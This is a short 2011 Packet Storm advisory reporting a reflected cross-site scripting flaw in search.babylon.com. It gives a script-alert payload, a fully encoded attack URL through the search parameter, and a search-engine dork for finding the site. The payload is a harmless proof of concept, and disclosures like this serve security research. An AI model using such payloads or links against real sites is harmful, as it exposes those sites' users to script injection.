Babylon Cross Site Scripting

2011-12-11T00:00:00
ID PACKETSTORM:107771
Type packetstorm
Reporter Abhinav Singh
Modified 2011-12-11T00:00:00

Description

                                        
                                            `##################################################################################################################  
  
  
HackingAlert  
  
Security Lies within you   
  
##################################################################################################################  
  
# Exploit Title: search.babylon.com XSS vulnerability  
# Date: 12/11/2011  
# Author: Abhinav Singh  
# Website: http://hackingalert.blogspot.com  
# Tested On: Win7  
# Platform: -  
# Email: abhinavbom@gmail.com  
# Google Dork : babylon search engine,©Babylon inc.  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
[$] Vulnerable : http://search.babylon.com  
  
[$] script : helloworld<script>alert('hackingalert');</script>  
  
[$] Vulnerable link : http://search.babylon.com/?q=helloworld%3Cscript%3Ealert%28%27hackingalert%27%29%3B%3C%2Fscript%3Ehelloworld&babsrc=home&s=web&as=0&t=0  
  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
Greetz : everyone in SecurityXploded Community(www.securityxploded.com)  
  
LYNS  
  
`